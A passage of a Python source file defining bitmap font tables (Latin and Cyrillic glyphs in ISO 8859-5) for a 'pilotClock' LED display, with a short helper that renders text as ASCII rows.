[0x1F, 0x14, 0x1C, 0x00], # 0xCC 'Ь'
[0x15, 0x15, 0x1F, 0x00], # 0xCD 'Э'
[0x1F, 0x04, 0x1F, 0x11, 0x1F, 0x00], # 0xCE 'Ю'
[0x1B, 0x05, 0x1F, 0x00], # 0xCF 'Я'
[0x1F, 0x05, 0x1F, 0x00], # 0xD0 'а'
[0x1F, 0x15, 0x19, 0x00], # 0xD1 'б'
[0x1F, 0x15, 0x1B, 0x00], # 0xD2 'в'
[0x1F, 0x01, 0x01, 0x00], # 0xD3 'г'
[0x30, 0x1F, 0x11, 0x1F, 0x30, 0x00], # 0xD4 'д'
[0x1F, 0x15, 0x15, 0x00], # 0xD5 'е'
[0x1B, 0x04, 0x1F, 0x04, 0x1B, 0x00], # 0xD6 'ж'
[0x15, 0x15, 0x1B, 0x00], # 0xD7 'з'
[0x0F, 0x10, 0x1F, 0x00], # 0xD8 'и'
[0x0F, 0x10, 0x1F, 0x00], # 0xD9 'й'
[0x1F, 0x04, 0x1B, 0x00], # 0xDA 'к'
[0x1E, 0x01, 0x1F, 0x00], # 0xDB 'л'
[0x1F, 0x01, 0x1E, 0x01, 0x1F, 0x00], # 0xDC 'м'
[0x1F, 0x04, 0x1F, 0x00], # 0xDD 'н'
[0x1F, 0x11, 0x1F, 0x00], # 0xDE 'о'
[0x1F, 0x01, 0x1F, 0x00], # 0xDF 'п'
[0x1F, 0x05, 0x07, 0x00], # 0xE0 'р'
[0x1F, 0x11, 0x11, 0x00], # 0xE1 'с'
[0x01, 0x1F, 0x01, 0x00], # 0xE2 'т'
[0x17, 0x14, 0x1F, 0x00], # 0xE3 'у'
[0x07, 0x05, 0x1F, 0x05, 0x07, 0x00], # 0xE4 'ф'
[0x1B, 0x04, 0x1B, 0x00], # 0xE5 'х'
[0x1F, 0x10, 0x1F, 0x30, 0x00], # 0xE6 'ц'
[0x07, 0x04, 0x1F, 0x00], # 0xE7 'ч'
[0x1F, 0x10, 0x1F, 0x10, 0x1F, 0x00], # 0xE8 'ш'
[0x1F, 0x10, 0x1F, 0x10, 0x1F, 0x30, 0x00], # 0xE9 'щ'
[0x01, 0x1F, 0x14, 0x1C, 0x00], # 0xEA 'ъ'
[0x1F, 0x14, 0x1C, 0x00, 0x1F, 0x00], # 0xEB 'ы'
[0x1F, 0x14, 0x1C, 0x00], # 0xEC 'ь'
[0x15, 0x15, 0x1F, 0x00], # 0xED 'э'
[0x1F, 0x04, 0x1F, 0x11, 0x1F, 0x00], # 0xEE 'ю'
[0x1B, 0x05, 0x1F, 0x00], # 0xEF 'я'
[0x1F, 0x04, 0x1F, 0x00, 0x01, 0x00], # 0xF0 '№'
[0x1F, 0x15, 0x15, 0x00], # 0xF1 'ё'
[0x00, 0x00, 0x00, 0x00], # 0xF2 'ђ'
[0x00, 0x00, 0x00, 0x00], # 0xF3 'ѓ'
[0x0E, 0x15, 0x11, 0x00], # 0xF4 'є'
[0x00, 0x00, 0x00, 0x00], # 0xF5 'ѕ'
[0x00, 0x00, 0x00, 0x00], # 0xF6 'і'
[0x01, 0x1E, 0x01, 0x00], # 0xF7 'ї'
[0x00, 0x00, 0x00, 0x00], # 0xF8 'ј'
[0x00, 0x00, 0x00, 0x00], # 0xF9 'љ'
[0x00, 0x00, 0x00, 0x00], # 0xFA 'њ'
[0x00, 0x00, 0x00, 0x00], # 0xFB 'ћ'
[0x00, 0x00, 0x00, 0x00], # 0xFC 'ќ'
[0x2F, 0x2D, 0x3D, 0x00], # 0xFD '§'
[0x00, 0x00, 0x00, 0x00], # 0xFE 'ў'
[0x00, 0x00, 0x00, 0x00], # 0xFF 'џ'
]
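# Illustrative sketch (not part of the original data): one plausible way to
# rasterize a string with the variable-width DATE_OUT_FONT above.  Assumptions,
# not confirmed by this module: glyphs are indexed by their ISO/IEC 8859-5 byte
# value, each glyph already ends in a 0x00 spacer column, and bit 0 of a column
# byte is the top pixel row while bit 5 is the bottom one.
def _render_date_text(text, height=6):
    """Return *text* as a list of text rows built from DATE_OUT_FONT columns."""
    columns = []
    for byte in text.encode("iso8859_5"):
        columns.extend(DATE_OUT_FONT[byte])
    return [
        "".join("#" if (col >> row) & 1 else "." for col in columns)
        for row in range(height)
    ]

# Example (assumed usage):
# for line in _render_date_text("12:34"):
#     print(line)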
#: Bit patterns for the pilotClock Run Line, ISO/IEC 8859-5 encoding, font height = 9
RUN_LINE_FONT = [
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x00
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x01
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x02
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x03
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x04
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x05
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x06
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x07
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x08
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x09
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x10
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x11
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x12
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x13
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x14
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x15
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x16
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x17
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x18
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x19
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1F
[0x0000, 0x0000, 0x0000], # 0x20 ' '
[0x005F, 0x0000], # 0x21 '!'
[0x0003, 0x0000, 0x0003, 0x0000], # 0x22 '"'
[0x0024, 0x007E, 0x0024, 0x007E, 0x0024, 0x0000], # 0x23 '#'
[0x0024, 0x00CA, 0x0053, 0x0024, 0x0000], # 0x24 '$'
[0x0062, 0x0018, 0x0046, 0x0000], # 0x25 '%'
[0x003A, 0x0045, 0x003A, 0x0050, 0x0000], # 0x26 '&'
[0x0003, 0x0000], # 0x27 '''
[0x003C, 0x0042, 0x0000], # 0x28 '('
[0x0042, 0x003C, 0x0000], # 0x29 ')'
[0x0028, 0x0010, 0x0028, 0x0000], # 0x2A '*'
[0x0010, 0x0038, 0x0010, 0x0000], # 0x2B '+'
[0x0080, 0x0040, 0x0000], # 0x2C ','
[0x0010, 0x0010, 0x0010, 0x0000], # 0x2D '-'
[0x0040, 0x0000], # 0x2E '.'
[0x0060, 0x0018, 0x0006, 0x0000], # 0x2F '/'
[0x003E, 0x0041, 0x0041, 0x003E, 0x0000], # 0x30 '0'
[0x0042, 0x007F, 0x0040, 0x0000], # 0x31 '1'
[0x0062, 0x0051, 0x0049, 0x0046, 0x0000], # 0x32 '2'
[0x0022, 0x0049, 0x0049, 0x0036, 0x0000], # 0x33 '3'
[0x0018, 0x0016, 0x0011, 0x007F, 0x0000], # 0x34 '4'
[0x002F, 0x0045, 0x0045, 0x0039, 0x0000], # 0x35 '5'
[0x003E, 0x0045, 0x0045, 0x0038, 0x0000], # 0x36 '6'
[0x0001, 0x0071, 0x000D, 0x0003, 0x0000], # 0x37 '7'
[0x0036, 0x0049, 0x0049, 0x0036, 0x0000], # 0x38 '8'
[0x000E, 0x0051, 0x0051, 0x003E, 0x0000], # 0x39 '9'
[0x0044, 0x0000], # 0x3A ':'
[0x0080, 0x0044, 0x0000], # 0x3B ';'
[0x0010, 0x0028, 0x0044, 0x0000], # 0x3C '<'
[0x0028, 0x0028, 0x0028, 0x0000], # 0x3D '='
[0x0044, 0x0028, 0x0010, 0x0000], # 0x3E '>'
[0x0002, 0x0051, 0x0009, 0x0006, 0x0000], # 0x3F '?'
[0x003E, 0x0041, 0x0049, 0x0055, 0x001E, 0x0000], # 0x40 '@'
[0x007E, 0x0011, 0x0011, 0x007E, 0x0000], # 0x41 'A'
[0x007F, 0x0049, 0x0049, 0x0036, 0x0000], # 0x42 'B'
[0x003E, 0x0041, 0x0041, 0x0022, 0x0000], # 0x43 'C'
[0x007F, 0x0041, 0x0041, 0x003E, 0x0000], # 0x44 'D'
[0x007F, 0x0049, 0x0049, 0x0041, 0x0000], # 0x45 'E'
[0x007F, 0x0009, 0x0009, 0x0001, 0x0000], # 0x46 'F'
[0x003E, 0x0041, 0x0051, 0x0072, 0x0000], # 0x47 'G'
[0x007F, 0x0008, 0x0008, 0x007F, 0x0000], # 0x48 'H'
[0x007F, 0x0000], # 0x49 'I'
[0x0030, 0x0040, 0x0040, 0x003F, 0x0000], # 0x4A 'J'
[0x007F, 0x0008, 0x0014, 0x0063, 0x0000], # 0x4B 'K'
[0x007F, 0x0040, 0x0040, 0x0040, 0x0000], # 0x4C 'L'
[0x007F, 0x0002, 0x0004, 0x0002, 0x007F, 0x0000], # 0x4D 'M'
[0x007F, 0x0002, 0x0004, 0x007F, 0x0000], # 0x4E 'N'
[0x003E, 0x0041, 0x0041, 0x003E, 0x0000], # 0x4F 'O'
[0x007F, 0x0011, 0x0011, 0x000E, 0x0000], # 0x50 'P'
[0x003E, 0x0041, 0x0061, 0x00FE, 0x0000], # 0x51 'Q'
[0x007F, 0x0011, 0x0011, 0x006E, 0x0000], # 0x52 'R'
[0x0026, 0x0049, 0x0049, 0x0032, 0x0000], # 0x53 'S'
[0x0001, 0x0001, 0x007F, 0x0001, 0x0001, 0x0000], # 0x54 'T'
[0x003F, 0x0040, 0x0040, 0x003F, 0x0000], # 0x55 'U'
[0x0007, 0x0018, 0x0060, 0x0018, 0x0007, 0x0000], # 0x56 'V'
[0x001F, 0x0060, 0x0018, 0x0060, 0x001F, 0x0000], # 0x57 'W'
[0x0077, 0x0008, 0x0008, 0x0077, 0x0000], # 0x58 'X'
[0x0007, 0x0048, 0x0048, 0x003F, 0x0000], # 0x59 'Y'
[0x0071, 0x0049, 0x0045, 0x0043, 0x0000], # 0x5A 'Z'
[0x007E, 0x0042, 0x0000], # 0x5B '['
[0x0006, 0x0018, 0x0060, 0x0000], # 0x5C '\'
[0x0042, 0x007E, 0x0000], # 0x5D ']'
[0x0004, 0x0002, 0x0004, 0x0000], # 0x5E '^'
[0x0040, 0x0040, 0x0040, 0x0000], # 0x5F '_'
[0x0001, 0x0002, 0x0000], # 0x60 '`'
[0x0038, 0x0044, 0x0024, 0x007C, 0x0000], # 0x61 'a'
[0x007F, 0x0048, 0x0044, 0x0038, 0x0000], # 0x62 'b'
[0x0038, 0x0044, 0x0044, 0x0028, 0x0000], # 0x63 'c'
[0x0038, 0x0044, 0x0048, 0x007F, 0x0000], # 0x64 'd'
[0x0038, 0x0054, 0x0054, 0x0058, 0x0000], # 0x65 'e'
[0x007E, 0x0009, 0x0002, 0x0000], # 0x66 'f'
[0x0038, 0x0144, 0x0148, 0x00FC, 0x0000], # 0x67 'g'
[0x007F, 0x0008, 0x0004, 0x0078, 0x0000], # 0x68 'h'
[0x007D, 0x0000], # 0x69 'i'
[0x0080, 0x0100, 0x00FD, 0x0000], # 0x6A 'j'
[0x007F, 0x0010, 0x0028, 0x0044, 0x0000], # 0x6B 'k'
[0x003F, 0x0040, 0x0000], # 0x6C 'l'
[0x007C, 0x0004, 0x007C, 0x0004, 0x0078, 0x0000], # 0x6D 'm'
[0x007C, 0x0008, 0x0004, 0x0078, 0x0000], # 0x6E 'n'
[0x0038, 0x0044, 0x0044, 0x0038, 0x0000], # 0x6F 'o'
[0x01FC, 0x0048, 0x0044, 0x0038, 0x0000], # 0x70 'p'
[0x0038, 0x0044, 0x0048, 0x01FC, 0x0000], # 0x71 'q'
[0x007C, 0x0008, 0x0004, 0x0008, 0x0000], # 0x72 'r'
[0x0048, 0x0054, 0x0054, 0x0020, 0x0000], # 0x73 's'
[0x0004, 0x003F, 0x0044, 0x0020, 0x0000], # 0x74 't'
[0x003C, 0x0040, 0x0020, 0x007C, 0x0000], # 0x75 'u'
[0x000C, 0x0030, 0x0040, 0x0030, 0x000C, 0x0000], # 0x76 'v'
[0x003C, 0x0040, 0x0030, 0x0040, 0x003C, 0x0000], # 0x77 'w'
[0x006C, 0x0010, 0x0010, 0x006C, 0x0000], # 0x78 'x'
[0x001C, 0x0120, 0x0120, 0x00FC, 0x0000], # 0x79 'y'
[0x0064, 0x0054, 0x004C, 0x0044, 0x0000], # 0x7A 'z'
[0x0010, 0x006C, 0x0082, 0x0000], # 0x7B '{'
[0x007F, 0x0000], # 0x7C '|'
[0x0082, 0x006C, 0x0010, 0x0000], # 0x7D '}'
[0x0004, 0x0002, 0x0004, 0x0002, 0x0000], # 0x7E '~'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x7F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x80
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x81
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x82
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x83
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x84
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x85
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x86
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x87
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x88
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x89
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x90
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x91
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x92
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x93
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x94
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x95
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x96
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x97
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x98
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x99
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA0 NBSP
[0x007F, 0x0049, 0x0049, 0x0041, 0x0000], # 0xA1 'Ё'
[0x0001, 0x007F, 0x0049, 0x0048, 0x0030, 0x0000], # 0xA2 'Ђ'
[0x007C, 0x0006, 0x0005, 0x0004, 0x0000], # 0xA3 'Ѓ'
[0x003E, 0x0049, 0x0049, 0x0022, 0x0000], # 0xA4 'Є'
[0x0026, 0x0049, 0x0049, 0x0032, 0x0000], # 0xA5 'Ѕ'
[0x007F, 0x0000], # 0xA6 'І'
[0x0001, 0x007E, 0x0001, 0x0000], # 0xA7 'Ї'
[0x0020, 0x0040, 0x003F, 0x0000], # 0xA8 'Ј'
[0x0040, 0x003E, 0x0001, 0x007F, 0x0048, 0x0048, 0x0030, 0x0000], # 0xA9 'Љ'
[0x007F, 0x0008, 0x0008, 0x007F, 0x0048, 0x0048, 0x0030, 0x0000], # 0xAA 'Њ'
[0x0001, 0x007F, 0x0009, 0x0008, 0x0070, 0x0000], # 0xAB 'Ћ'
[0x007C, 0x0012, 0x0011, 0x006C, 0x0000], # 0xAC 'Ќ'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAD SHY
[0x000C, 0x0051, 0x0051, 0x003C, 0x0000], # 0xAE 'Ў'
[0x007F, 0x01C0, 0x007F, 0x0000], # 0xAF 'Џ'
[0x0078, 0x0016, 0x0011, 0x007F, 0x0000], # 0xB0 'А'
[0x007F, 0x0049, 0x0049, 0x0031, 0x0000], # 0xB1 'Б'
[0x007F, 0x0049, 0x0049, 0x0036, 0x0000], # 0xB2 'В'
[0x007F, 0x0001, 0x0001, 0x0003, 0x0000], # 0xB3 'Г'
[0x00C0, 0x007E, 0x0041, 0x0041, 0x007F, 0x00C0, 0x0000], # 0xB4 'Д'
[0x007F, 0x0049, 0x0049, 0x0041, 0x0000], # 0xB5 'Е'
[0x0077, 0x0008, 0x007F, 0x0008, 0x0077, 0x0000], # 0xB6 'Ж'
[0x0022, 0x0041, 0x0049, 0x0036, 0x0000], # 0xB7 'З'
[0x007F, 0x0020, 0x0010, 0x007F, 0x0000], # 0xB8 'И'
[0x007F, 0x0020, 0x0010, 0x007F, 0x0000], # 0xB9 'Й'
[0x007F, 0x0008, 0x0014, 0x0063, 0x0000], # 0xBA 'К'
[0x0040, 0x003E, 0x0001, 0x007F, 0x0000], # 0xBB 'Л'
[0x007F, 0x0002, 0x000C, 0x0002, 0x007F, 0x0000], # 0xBC 'М'
[0x007F, 0x0008, 0x0008, 0x007F, 0x0000], # 0xBD 'Н'
[0x003E, 0x0041, 0x0041, 0x003E, 0x0000], # 0xBE 'О'
[0x007F, 0x0001, 0x0001, 0x007F, 0x0000], # 0xBF 'П'
[0x007F, 0x0011, 0x0011, 0x000E, 0x0000], # 0xC0 'Р'
[0x003E, 0x0041, 0x0041, 0x0022, 0x0000], # 0xC1 'С'
[0x0001, 0x0001, 0x007F, 0x0001, 0x0001, 0x0000], # 0xC2 'Т'
[0x0007, 0x0048, 0x0030, 0x000F, 0x0000], # 0xC3 'У'
[0x000E, 0x0011, 0x007F, 0x0011, 0x000E, 0x0000], # 0xC4 'Ф'
[0x0077, 0x0008, 0x0008, 0x0077, 0x0000], # 0xC5 'Х'
[0x007F, 0x0040, 0x0040, 0x007F, 0x00C0, 0x0000], # 0xC6 'Ц'
[0x0007, 0x0008, 0x0008, 0x007F, 0x0000], # 0xC7 'Ч'
[0x007F, 0x0040, 0x007F, 0x0040, 0x007F, 0x0000], # 0xC8 'Ш'
[0x007F, 0x0040, 0x007F, 0x0040, 0x007F, 0x00C0, 0x0000], # 0xC9 'Щ'
[0x0001, 0x007F, 0x0044, 0x0044, 0x0038, 0x0000], # 0xCA 'Ъ'
[0x007F, 0x0044, 0x0038, 0x0000, 0x007F, 0x0000], # 0xCB 'Ы'
[0x007F, 0x0044, 0x0044, 0x0038, 0x0000], # 0xCC 'Ь'
[0x0022, 0x0049, 0x0049, 0x003E, 0x0000], # 0xCD 'Э'
[0x007F, 0x0008, 0x003E, 0x0041, 0x003E, 0x0000], # 0xCE 'Ю'
[0x006E, 0x0011, 0x0011, 0x007F, 0x0000], # 0xCF 'Я'
[0x0038, 0x0044, 0x0024, 0x007C, 0x0000], # 0xD0 'а'
[0x003C, 0x004A, 0x004B, 0x0030, 0x0000], # 0xD1 'б'
[0x007C, 0x0054, 0x0054, 0x0028, 0x0000], # 0xD2 'в'
[0x0020, 0x0054, 0x0054, 0x0048, 0x0000], # 0xD3 'г'
[0x0038, 0x0144, 0x0144, 0x00F8, 0x0000], # 0xD4 'д'
[0x0038, 0x0054, 0x0054, 0x0018, 0x0000], # 0xD5 'е'
[0x006C, 0x0010, 0x007C, 0x0010, 0x006C, 0x0000], # 0xD6 'ж'
[0x0028, 0x0044, 0x0054, 0x0028, 0x0000], # 0xD7 'з'
[0x003C, 0x0040, 0x0020, 0x007C, 0x0000], # 0xD8 'и'
[0x003C, 0x0041, 0x0021, 0x007C, 0x0000], # 0xD9 'й'
[0x007C, 0x0010, 0x0028, 0x0044, 0x0000], # 0xDA 'к'
[0x0040, 0x0038, 0x0004, 0x007C, 0x0000], # 0xDB 'л'
[0x007C, 0x0008, 0x0010, 0x0008, 0x007C, 0x0000], # 0xDC 'м'
[0x007C, 0x0010, 0x0010, 0x007C, 0x0000], # 0xDD 'н'
[0x0038, 0x0044, 0x0044, 0x0038, 0x0000], # 0xDE 'о'
[0x007C, 0x0004, 0x0004, 0x007C, 0x0000], # 0xDF 'п'
[0x01FC, 0x0048, 0x0044, 0x0038, 0x0000], # 0xE0 'р'
[0x0038, 0x0044, 0x0044, 0x0028, 0x0000], # 0xE1 'с'
[0x0004, 0x007C, 0x0004, 0x0000], # 0xE2 'т'
[0x001C, 0x0120, 0x00C0, 0x003C, 0x0000], # 0xE3 'у'
[0x0038, 0x0044, 0x01FC, 0x0044, 0x0038, 0x0000], # 0xE4 'ф'
[0x006C, 0x0010, 0x0010, 0x006C, 0x0000], # 0xE5 'х'
[0x007C, 0x0040, 0x0040, 0x007C, 0x00C0, 0x0000], # 0xE6 'ц'
[0x000C, 0x0010, 0x0010, 0x007C, 0x0000], # 0xE7 'ч'
[0x007C, 0x0040, 0x0078, 0x0040, 0x007C, 0x0000], # 0xE8 'ш'
[0x007C, 0x0040, 0x0078, 0x0040, 0x007C, 0x00C0, 0x0000], # 0xE9 'щ'
[0x0004, 0x007C, 0x0050, 0x0050, 0x0020, 0x0000], # 0xEA 'ъ'
[0x007C, 0x0050, 0x0020, 0x0000, 0x007C, 0x0000], # 0xEB 'ы'
[0x007C, 0x0050, 0x0050, 0x0020, 0x0000], # 0xEC 'ь'
[0x0028, 0x0044, 0x0054, 0x0038, 0x0000], # 0xED 'э'
[0x007C, 0x0010, 0x0038, 0x0044, 0x0038, 0x0000], # 0xEE 'ю'
[0x0048, 0x0034, 0x0014, 0x007C, 0x0000], # 0xEF 'я'
[0x007F, 0x0002, 0x0004, 0x007F, 0x0000, 0x0001, 0x0000], # 0xF0 '№'
[0x0039, 0x0054, 0x0054, 0x0059, 0x0000], # 0xF1 'ё'
[0x0002, 0x007F, 0x000A, 0x0108, 0x00F0, 0x0000], # 0xF2 'ђ'
[0x0078, 0x000C, 0x000A, 0x0008, 0x0000], # 0xF3 'ѓ'
[0x0038, 0x0054, 0x0044, 0x0028, 0x0000], # 0xF4 'є'
[0x0048, 0x0054, 0x0054, 0x0020, 0x0000], # 0xF5 'ѕ'
[0x007D, 0x0000], # 0xF6 'і'
[0x0002, 0x0078, 0x0002, 0x0000, 0x0000], # 0xF7 'ї'
[0x0080, 0x0100, 0x00FD, 0x0000], # 0xF8 'ј'
[0x0040, 0x0038, 0x0004, 0x007C, 0x0050, 0x0050, 0x0020, 0x0000], # 0xF9 'љ'
[0x007C, 0x0010, 0x0010, 0x007C, 0x0050, 0x0050, 0x0020, 0x0000], # 0xFA 'њ'
[0x0002, 0x007F, 0x000A, 0x0008, 0x0070, 0x0000], # 0xFB 'ћ'
[0x007C, 0x0012, 0x0011, 0x006C, 0x0000], # 0xFC 'ќ'
[0x009A, 0x0125, 0x0149, 0x00B2, 0x0000], # 0xFD '§'
[0x0038, 0x0142, 0x0142, 0x00F8, 0x0000], # 0xFE 'ў'
[0x007C, 0x00C0, 0x007C, 0x0000], # 0xFF 'џ'
]
#: Bit patterns for the pilotClock Temperature Out font, ISO/IEC 8859-5 encoding, font height = 7
THERM_DIGITS_FONT = [
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x00
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x01
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x02
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x03
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x04
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x05
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x06
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x07
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x08
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x09
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x0A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x0B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x0C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x0D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x0E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x0F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x10
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x11
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x12
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x13
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x14
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x15
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x16
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x17
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x18
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x19
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x1A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x1B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x1C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x1D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x1E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x1F
[0x00, 0x00, 0x00], # 0x20 ' '
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x21
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x22
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x23
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x24
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x25
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x26
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x27
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x28
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x29
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x2A
[0x08, 0x1C, 0x08, 0x00], # 0x2B '+'
[0x80, 0x40, 0x00], # 0x2C ','
[0x08, 0x08, 0x08, 0x00], # 0x2D '-'
[0x40, 0x00], # 0x2E '.'
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x2F
[0x3E, 0x41, 0x41, 0x3E, 0x00], # 0x30 '0'
[0x42, 0x7F, 0x40, 0x00], # 0x31 '1'
[0x62, 0x51, 0x49, 0x46, 0x00], # 0x32 '2'
[0x22, 0x49, 0x49, 0x36, 0x00], # 0x33 '3'
[0x18, 0x16, 0x11, 0x7F, 0x00], # 0x34 '4'
[0x2F, 0x45, 0x45, 0x39, 0x00], # 0x35 '5'
[0x3E, 0x49, 0x49, 0x32, 0x00], # 0x36 '6'
[0x03, 0x61, 0x19, 0x07, 0x00], # 0x37 '7'
[0x36, 0x49, 0x49, 0x36, 0x00], # 0x38 '8'
[0x26, 0x49, 0x49, 0x3E, 0x00], # 0x39 '9'
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x3A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x3B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x3C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x3D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x3E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x3F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x40
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x41
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x42
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x43
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x44
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x45
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x46
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x47
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x48
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x49
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x4A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x4B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x4C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x4D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x4E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x4F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x50
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x51
